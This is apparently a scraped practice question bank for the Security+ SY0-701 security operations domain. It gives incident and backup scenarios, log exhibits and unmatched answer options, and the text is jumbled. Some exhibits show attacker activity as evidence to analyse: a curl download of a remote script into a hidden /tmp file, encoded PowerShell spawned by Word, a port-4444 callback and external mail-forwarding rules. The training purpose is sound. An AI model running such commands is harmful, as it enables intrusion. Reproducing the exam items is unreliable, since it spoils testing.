SY0-701 Security Operations • Complete Question Bank
Complete SY0-701 Security Operations question bank — all 0 questions with answers and detailed explanations.
Disaster recovery review for the customer billing platform
Current backup design:
- Full backup once per day at 23:00
- Backups stored on the same storage cluster as production VM snapshots
- Backup administrator account is shared by the operations team
- Restore test cadence: none in the last 12 months
- Current measured restore time from bare metal: 7 hours
Business recovery targets:
- RTO: 2 hours
- RPO: 15 minutes
Based on the exhibit, what is the most likely SOC conclusion and next action?
A scheduled alert fired on a server that repeatedly connects to a vendor update site at fixed intervals. The security team wants to know whether the alert represents a real threat or a harmless operational pattern.
10:00:02 patch-srv-12 service 'AcmePatchAgent' started by NT AUTHORITY\SYSTEM
10:00:05 patch-srv-12 DNS query: updates.acmecorp.com -> 198.51.100.44
10:00:05 patch-srv-12 outbound TLS connection to 198.51.100.44:443
10:00:07 SIEM rule 'possible beaconing every 15 minutes' triggered
10:15:03 patch-srv-12 DNS query: updates.acmecorp.com -> 198.51.100.44
10:15:03 patch-srv-12 outbound TLS connection to 198.51.100.44:443
10:15:04 EDR metadata: process hash matches approved vendor signature
CMDB: Asset group = Patch Management Server; maintenance window = daily 10:00-10:30
Server: HR-APP02
Finding: Outdated OpenSSL library with a critical remotely exploitable weakness
Vendor status: Fix unavailable for 21 days
Exposure: The service must remain online
Current access: host firewall allows TCP 443 from any source
Monitoring: Monthly vulnerability scans only
Available controls: reverse proxy, WAF, IP allow lists, jump host for administration
ERP database protection summary:
- Required RTO: 2 hours
- Required RPO: 15 minutes
- Current backup schedule:
  * Full backup every Sunday at 01:00
  * Differential backup daily at 01:00
  * Transaction log backup every 30 minutes
- Estimated restore time from backup media: 90 minutes after media is available
- No standby server exists
- Restore testing occurs once per year
Backup status for the billing application
Current design:
- Nightly full backup at 01:00
- Backup repository: NAS-BACKUP01
- NAS-BACKUP01 is joined to the same Active Directory domain as production servers
- Backup share is mounted over SMB from the production network
- Last restore test: 5 months ago, failed due to permissions error
Business targets:
- RTO: 4 hours
- RPO: 30 minutes
Based on the exhibit, what is the most likely conclusion after correlating the logs?
A configuration-management task ran from a jump host and generated repeated login alerts on target servers. The SOC wants to determine whether this is malicious activity or approved automation.
Change window: approved 01:00-02:00
01:11:44 jump01 ssh to appsrv02 as configsvc from 10.1.10.20
01:11:47 jump01 ssh to appsrv03 as configsvc from 10.1.10.20
01:12:01 appsrv02 auth.log 2 failed password attempts for configsvc, then success with SSH key
01:12:04 appsrv03 auth.log 1 failed password attempt for configsvc, then success with SSH key
01:12:10 SIEM rule 'brute force against privileged account' triggered
CMDB / automation note: configsvc is restricted to Ansible playbooks launched only from jump01 during maintenance windows
Based on the exhibit, what is the best immediate action for the SOC or IR team?
A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.
Host: finance-lap07
10:22:11 winword.exe spawned powershell.exe -enc <redacted>
10:22:14 powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02 file rename activity: 184 files changed to *.locked
10:24:09 outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01 EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'
Linux server audit summary: APP-SRV14
10:22:13 sshd: Accepted publickey for appsvc from 10.5.14.22
10:23:01 sudo: appsvc ran /usr/bin/curl https://198.51.100.44/p.sh -o /tmp/.x
10:23:09 sudo: appsvc ran chmod +x /tmp/.x
10:23:11 /tmp/.x created /etc/cron.d/.maint
10:23:20 /etc/ssh/sshd_config modified to allow PasswordAuthentication yes
10:24:02 outbound traffic blocked by segmentation rule
IR note: host is isolated, disk image has not been taken yet, and the business wants the service restored today
Network and endpoint logs for workstation WS-204
10:12:08 DNS query from WS-204 to 10.20.1.15 for wpad.corp.local
10:12:09 HTTP request from WS-204 to 10.20.1.15 for /wpad.dat
10:12:10 Proxy auto-detect enabled in browser policy
10:12:11 Traffic from WS-204 now exits through proxy 10.20.1.15
Asset inventory:
- 10.20.1.15 = CORP-PROXY01
- CORP-PROXY01 is listed as the approved outbound web proxy
Based on the exhibit, which issue should be remediated first by the operations team?
A small company has limited maintenance windows and can address only one of several findings this week.
Weekly vulnerability report:
1. vpn-gw01
   - Exposure: Internet-facing
   - Finding: Critical remote code execution
   - Notes: Vendor patch available; reboot required
2. db-lab02
   - Exposure: Internal only
   - Finding: High-severity authentication bypass
   - Notes: Isolated lab subnet; no sensitive data; no route to production
3. printsrv03
   - Exposure: Internet-facing administrative portal
   - Finding: Medium-severity outdated firmware
   - Notes: Vendor has not released a fix yet; temporary ACL blocks the admin port from the internet
A vulnerability dashboard shows four new findings. Which one should be remediated first by the operations team?
- A low-severity issue on an offline lab VM
- A medium-severity issue on a payroll server with no known exploit
- A critical issue on an internet-facing web server with an available exploit
- A high-severity issue on a test workstation that is not domain joined
Based on the exhibit, what is the best eradication decision after containment?
A quarantined endpoint was found to have a malicious startup item and a scheduled task. The team has already isolated it from the network and preserved memory for analysis.
Host: eng-lt-44
Containment status: network quarantined
Registry artifact: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater = C:\Users\maria\AppData\Roaming\update.exe
Scheduled task:
- TaskName: SysMaint
- Action: C:\Users\maria\AppData\Roaming\update.exe /svc
- Trigger: every 30 minutes
File hash: update.exe SHA256 matches known malware family 'QuillDoor'
User impact:
- Browser pop-ups observed earlier
- No confirmed encryption
- No evidence of additional hosts compromised
Prioritized vulnerability review

| Asset      | Severity | Exposure                | Notes                                                            |
|------------|----------|-------------------------|------------------------------------------------------------------|
| VPN-EDGE01 | Critical | Internet-facing         | Remote code execution; exploit proof-of-concept publicly available |
| FILE-02    | High     | Internal file server    | SMB service outdated; only reachable from corp subnet            |
| TEST-VM-17 | High     | Isolated test network   | No route from production; development team owns it               |
| PRINTER-3F | Medium   | Office user VLAN        | Default admin credentials; management interface reachable via HTTP |
Microsoft 365 audit trail for user amaya@corp.example:
09:41 User clicked link from external message and signed into a lookalike portal
09:42 OAuth consent granted to app 'ExpenseReport-Helper' scopes=Mail.Read, offline_access, User.Read
09:44 Inbox rule created: if subject contains 'invoice' then forward to finance-relay@external.example
09:46 Refresh token issued from unfamiliar IP 203.0.113.88
09:51 Admin deleted inbox rule
09:52 Password changed successfully
Based on the exhibit, which change best improves both recovery time and recovery point for the ERP database?
A mid-sized company has a two-hour RTO and a 30-minute RPO, but its current backup design cannot meet either objective during restore testing.
System: ERP database cluster
Business requirements:
- RTO = 2 hours
- RPO = 30 minutes
Current recovery design:
- Nightly full backup at 23:00 to onsite NAS
- Differential backup at 12:00
- Weekly copy replicated to cloud on Sundays
Restore test results:
- Cold rebuild of VM + database restore: 5 hours 40 minutes
- Data gap since last backup: 2 hours 18 minutes
- NAS is online and joined to the same domain as production servers
DNS telemetry for host LAP-09:
10:14:02 query=TXT name=k7f3a9d1a.reporting-updates.net client=10.1.8.44
10:15:02 query=TXT name=m2b8c4.reporting-updates.net client=10.1.8.44
10:16:02 query=TXT name=q9z1x7.reporting-updates.net client=10.1.8.44
10:17:02 query=TXT name=t4n8p2.reporting-updates.net client=10.1.8.44
Packet summary: 58-byte UDP responses, repeated every 60 seconds
Proxy logs: no HTTP or HTTPS sessions to reporting-updates.net
EDR: python.exe launched by signed pdf reader, process exited in 3 seconds
EDR network telemetry: same pattern continued after the document closed
EDR timeline - WS-224
11:07 User opened invoice.docm
11:08 winword.exe spawned powershell.exe -enc <redacted>
11:09 PowerShell created C:\ProgramData\updater.vbs
11:10 Scheduled task 'UpdaterSvc' created to run at logon
11:12 Outbound connection blocked to 203.0.113.77:8443
11:14 Host isolated from the network
11:16 Memory capture completed
Analyst note: The workstation was used for finance approvals during the last hour. No other hosts have shown the same indicators yet.
Current backup design:
- Production file server backs up nightly at 23:00 to NAS-Backup over SMB.
- NAS-Backup is mounted read/write to the file server 24x7.
- Weekly copy job replicates NAS contents to cloud object storage.
- Backup credentials are shared with the server admin group.
- Last restore test: 14 months ago.
Incident summary:
- Ransomware encrypted production files and then encrypted the NAS share using the same credentials.
Email security investigation for user amiller
- User submitted credentials on a fake sign-in page at 08:22
- Password was reset at 08:35
- Active sessions were revoked at 08:36
- Mailbox audit now shows:
  * Inbox rule: 'FinanceDocs' forwards any message with 'invoice' to external address redacted@proton.example
  * OAuth consent granted to unknown application 'QuickDocs Sync'
  * Deleted Items folder contains no suspicious messages
Help desk confirms the user still has access to the mailbox after reset.
Match each incident response activity to the phase of the incident response lifecycle it best represents. Use each option once.
1. A SOC analyst disables a compromised account, isolates the workstation from the network, and preserves volatile evidence.
2. The team images the infected system, removes the malicious persistence mechanism, and patches the exploited vulnerability.
3. After restoring services, the team reviews timeline gaps, detection delays, and control failures with management.
4. Before the attack occurs, the team verifies contact lists, playbooks, escalation paths, and backup credentials.
5. The team confirms suspicious authentication logs, endpoint alerts, and unusual outbound traffic indicate an active compromise.
Drag a concept onto its matching description — or click a concept then click the description.
Containment
Eradication
Lessons learned
Preparation
Identification
Data Room Environmental Sensor Log
10:15 Humidity: 82%
10:16 Leak Sensor Under Rack 7: Dry
10:17 Leak Sensor Under Rack 7: Wet
10:18 Water Detected Under Raised Floor
Facilities Note: 'Condensation forms on the chilled-water pipe during humid afternoons.'
Windows Task Scheduler Settings
Task Name: DailyLogArchive
Run As: Administrator
Trigger: Daily at 01:00
Action: powershell.exe -File C:\Scripts\Archive.ps1
Security Options: 'Run only when user is logged on' = Enabled
Note: The script only copies logs to a shared archive location.
Email Security Gateway Queue
Message ID: 77129
From: vendor.billing@example.net
Subject: Updated invoice for Q4
Attachment: invoice_q4.xlsm
Attachment Type: Macro-enabled spreadsheet
Static Scan Result: No signature match
Dynamic Analysis Status: pending
Policy Action: hold for review
Facility Access Log
Location: Records Room Door 3
08:11 Badge ID 1441 Granted
08:11 Door Opened
08:12 Door Held Open Alarm Cleared
08:12 Badge ID 1441 Granted
08:12 Door Opened
Camera Note: 'Unknown person followed employee through the door.'
Backup Status Report
System: File Server FS-03
Nightly Backup Job: SUCCESS
Backup Sets Retained: 14
Last Successful Job: 02:00 today
Last Restore Test: 118 days ago
Note: No recent validation of file recovery has been recorded.
Evidence Receipt Form
Case: 24-1187
Item: 4A
Description: SSD from workstation WS-14
Acquisition Method: Bit-for-bit image created with write blocker
Source SHA-256: 9e8f1a7c4c0d2f1b...
Image SHA-256: not yet calculated
Chain of Custody: pending analyst verification
EDR Alert Summary
Host: FIN-LT-22
Severity: High
Detection: Suspicious PowerShell with encoded command
Parent Process: winword.exe
Network Activity: outbound connection to 203.0.113.77:4444
User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'
Check whether the pattern matches password spraying across accounts rather than a brute-force attempt on one user.
Pivot to parent-child process trees and script-block telemetry on the endpoint.
Compare the query pattern and periodicity for possible DNS tunneling or beaconing.
Correlate with scheduled tasks, recent file creation, and account activity for staging or exfiltration.
Review token/session logs and conditional-access telemetry to see whether a hijacked session or relay attack occurred.
Investigate possible script-based malware execution launched through a document
Check for suspicious domain lookups that may indicate command-and-control activity
Look for beaconing behavior from a potentially compromised endpoint
Assess for stolen credentials or credential-stuffing activity
Use a phased rollout to catch compatibility issues early
Provide a rollback or backout plan if the patch fails
Place the work inside a maintenance window
Create a baseline that supports recovery and comparison
Apply change control and obtain approval
Contain the incident and limit spread to other systems
Preserve evidence that could disappear after power-off
Eradicate persistence and return the system to a trusted state
Recover business operations and return service to normal
Complete lessons learned and improve future response
Living-off-the-land or fileless malware execution
DNS tunneling or command-and-control beaconing
Password spraying or credential stuffing that succeeded
Compromised privileged credentials with persistence and post-exploitation activity